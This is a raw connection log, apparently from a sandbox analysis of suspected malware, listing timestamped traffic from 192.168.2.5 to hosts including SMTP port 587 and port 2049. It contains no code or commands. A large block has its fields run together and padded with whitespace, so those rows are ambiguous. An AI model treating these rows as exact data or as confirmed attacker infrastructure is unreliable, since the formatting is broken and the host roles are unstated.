Nov 5, 2024 17:02:56.383856058 CET | 80 | 59392 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:02:56.466556072 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.469086885 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:56.473929882 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.713000059 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.714153051 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:56.722534895 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.750453949 CET | 80 | 59391 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.750540972 CET | 59391 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.750750065 CET | 59391 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.755549908 CET | 80 | 59391 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.757864952 CET | 59393 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.767025948 CET | 80 | 59393 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.767172098 CET | 59393 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.791968107 CET | 59393 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.791968107 CET | 59393 | 80 | 192.168.2.5 | 172.234.222.143
Nov 5, 2024 17:02:56.796849012 CET | 80 | 59393 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.796860933 CET | 80 | 59393 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:56.958017111 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:56.983091116 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:56.988039017 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:57.029869080 CET | 80 | 59392 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:02:57.030015945 CET | 59392 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:57.035218000 CET | 80 | 59392 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:02:57.035331964 CET | 59392 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:02:57.129640102 CET | 59394 | 80 | 192.168.2.5 | 172.234.222.138
Nov 5, 2024 17:02:57.134555101 CET | 80 | 59394 | 172.234.222.138 | 192.168.2.5
Nov 5, 2024 17:02:57.134634018 CET | 59394 | 80 | 192.168.2.5 | 172.234.222.138
Nov 5, 2024 17:02:57.134841919 CET | 59394 | 80 | 192.168.2.5 | 172.234.222.138
Nov 5, 2024 17:02:57.134864092 CET | 59394 | 80 | 192.168.2.5 | 172.234.222.138
Nov 5, 2024 17:02:57.139626026 CET | 80 | 59394 | 172.234.222.138 | 192.168.2.5
Nov 5, 2024 17:02:57.139640093 CET | 80 | 59394 | 172.234.222.138 | 192.168.2.5
Nov 5, 2024 17:02:57.236079931 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:57.236342907 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:02:57.241229057 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:02:57.437916994 CET | 80 | 59393 | 172.234.222.143 | 192.168.2.5
Nov 5, 2024 17:02:57.437980890 CET | 59393 | 80 | 192.168.2.5 | 172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.438159943 CET5939380192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.442976952 CET8059393172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.470896006 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.475780964 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.475872040 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.476269007 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.476289034 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.481069088 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.481081009 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.496409893 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.496640921 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.501636028 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.746264935 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.746464968 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.751627922 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.804547071 CET8059394172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.804634094 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.805068970 CET5939480192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.809864044 CET8059394172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.902299881 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.907303095 CET8059396172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.907440901 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.926479101 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.926534891 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.931390047 CET8059396172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.931404114 CET8059396172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.990611076 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.991391897 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.991391897 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.991391897 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.991441965 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.996304989 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.996315956 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.996468067 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.996488094 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.236659050 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.419336081 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.422101974 CET593972049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.429528952 CET204959397212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.429608107 CET593972049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.429919004 CET593972049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.434843063 CET204959397212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.581943989 CET8059396172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.582766056 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.646842957 CET5939680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.651771069 CET8059396172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.732135057 CET49711587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.737566948 CET5874971151.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.836993933 CET5939880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.842108011 CET805939818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.842197895 CET5939880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.845659018 CET5939880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.845685959 CET5939880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.850481033 CET805939818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.850734949 CET805939818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.923948050 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.924086094 CET5939580192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.929364920 CET805939518.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.929414988 CET5939580192.168.2.518.141.10.107
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 5, 2024 17:02:58.940234900 CET  2049         59397      212.162.149.53   192.168.2.5
Nov 5, 2024 17:02:58.940300941 CET  59397        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:02:58.940713882 CET  59397        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:02:58.963658094 CET  59399        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:02:58.968638897 CET  80           59399      82.112.184.197   192.168.2.5
Nov 5, 2024 17:02:58.968733072 CET  59399        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:02:58.968955994 CET  59399        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:02:58.968977928 CET  59399        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:02:58.973819971 CET  80           59399      82.112.184.197   192.168.2.5
Nov 5, 2024 17:02:58.973850965 CET  80           59399      82.112.184.197   192.168.2.5
Nov 5, 2024 17:02:58.976207018 CET  587          49711      51.195.88.199    192.168.2.5
Nov 5, 2024 17:02:58.976669073 CET  49711        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:02:58.977411032 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:02:58.982501030 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:02:58.982564926 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:02:59.881762981 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:02:59.881983995 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:02:59.887041092 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.124954939 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.125657082 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:00.132285118 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.281542063 CET  80           59398      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:00.286653042 CET  59398        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:00.292150021 CET  80           59398      18.141.10.107    192.168.2.5
Nov 5, 2024 17:03:00.292212009 CET  59398        80         192.168.2.5      18.141.10.107
Nov 5, 2024 17:03:00.370814085 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.371109962 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:00.376137018 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.385101080 CET  59402        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:00.390253067 CET  80           59402      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:00.391127110 CET  59402        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:00.391305923 CET  59402        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:00.391361952 CET  59402        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:00.396379948 CET  80           59402      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:00.396401882 CET  80           59402      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:00.621036053 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.621078968 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.621160984 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.621175051 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.621292114 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:00.621292114 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:00.632144928 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:00.637001038 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.875030041 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:00.876298904 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:00.881268024 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.119296074 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.130687952 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:01.135724068 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.374892950 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.375442982 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:01.380431890 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.622426987 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.623264074 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:01.628269911 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.866153955 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:01.866377115 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:01.871248960 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.114831924 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.115015984 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.119961977 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.358439922 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.359761953 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.359858036 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.359977961 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.360013962 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.360063076 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.360100985 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.360138893 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.360158920 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.360183954 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.360203028 CET  59400        587        192.168.2.5      51.195.88.199
Nov 5, 2024 17:03:02.364845991 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.364911079 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.365773916 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.365787029 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.365797997 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.365808964 CET  587          59400      51.195.88.199    192.168.2.5
Nov 5, 2024 17:03:02.365819931 CET  587          59400      51.195.88.199    192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:02.365830898 CET5875940051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:02.365844011 CET5875940051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:02.365854979 CET5875940051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:02.621484995 CET5875940051.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:02.793986082 CET59400587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:03.985030890 CET594142049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:03.988518000 CET5940280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:03.990010977 CET204959414212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:03.990082026 CET594142049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:03.990313053 CET594142049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:03.995327950 CET204959414212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.148489952 CET5941680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.153439999 CET805941682.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.153517962 CET5941680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.154068947 CET5941680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.154093981 CET5941680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.159086943 CET805941682.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.159193993 CET805941682.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.482224941 CET204959414212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.482290983 CET594142049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:04.482515097 CET594142049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.108114958 CET5939980192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.118020058 CET5943780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.122792959 CET805943782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.122874022 CET5943780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.123045921 CET5943780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.123068094 CET5943780192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.128113031 CET805943782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.128134012 CET805943782.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:07.981765032 CET5941680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.144500971 CET5944380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.149620056 CET805944382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.149688959 CET5944380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.155162096 CET5944380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.156380892 CET5944380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.160060883 CET805944382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.161629915 CET805944382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.498699903 CET594492049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.503577948 CET204959449212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.503674030 CET594492049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.503885031 CET594492049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.508913040 CET204959449212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.989320993 CET204959449212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.989384890 CET594492049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:09.989654064 CET594492049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:11.987442970 CET5944380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.100878000 CET5946580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.105700970 CET805946582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.106637001 CET5946580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.106858015 CET5946580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.106929064 CET5946580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.111722946 CET805946582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:12.111733913 CET805946582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:14.998987913 CET594812049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.003902912 CET204959481212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.003973961 CET594812049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.004188061 CET594812049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.009047031 CET204959481212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.517739058 CET204959481212.162.149.53192.168.2.5
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 5, 2024 17:03:15.517802954 CET  59481        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:15.517996073 CET  59481        2049       192.168.2.5      212.162.149.53
Nov 5, 2024 17:03:15.618038893 CET  80           59437      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:15.618102074 CET  59437        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:15.618146896 CET  59437        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:15.623161077 CET  80           59437      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:15.648384094 CET  59487        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:15.653372049 CET  80           59487      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:15.653434992 CET  59487        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:15.653625965 CET  59487        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:15.653646946 CET  59487        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:15.658688068 CET  80           59487      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:15.658699036 CET  80           59487      82.112.184.197   192.168.2.5
Nov 5, 2024 17:03:15.997250080 CET  59465        80         192.168.2.5      82.112.184.197
Nov 5, 2024 17:03:16.233469963 CET  59491        80         192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:16.238620996 CET  80           59491      47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:16.238691092 CET  59491        80         192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:16.243174076 CET  59491        80         192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:16.243174076 CET  59491        80         192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:16.248090982 CET  80           59491      47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:16.249967098 CET  80           59491      47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:17.692315102 CET  80           59491      47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:17.695816040 CET  59491        80         192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:17.701231956 CET  80           59491      47.129.31.212    192.168.2.5
Nov 5, 2024 17:03:17.701730013 CET  59491        80         192.168.2.5      47.129.31.212
Nov 5, 2024 17:03:17.875299931 CET  59498        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:17.880247116 CET  80           59498      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:17.880336046 CET  59498        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:17.886892080 CET  59498        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:17.886946917 CET  59498        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:17.891696930 CET  80           59498      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:17.891782999 CET  80           59498      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:19.334955931 CET  80           59498      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:19.388694048 CET  59498        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:19.515299082 CET  59498        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:19.520663977 CET  80           59498      13.251.16.150    192.168.2.5
Nov 5, 2024 17:03:19.520730019 CET  59498        80         192.168.2.5      13.251.16.150
Nov 5, 2024 17:03:19.702630043 CET  59508        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:19.707551003 CET  80           59508      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:19.707617998 CET  59508        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:19.708985090 CET  59508        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:19.709032059 CET  59508        80         192.168.2.5      44.221.84.105
Nov 5, 2024 17:03:19.713856936 CET  80           59508      44.221.84.105    192.168.2.5
Nov 5, 2024 17:03:19.713881016 CET  80           59508      44.221.84.105    192.168.2.5
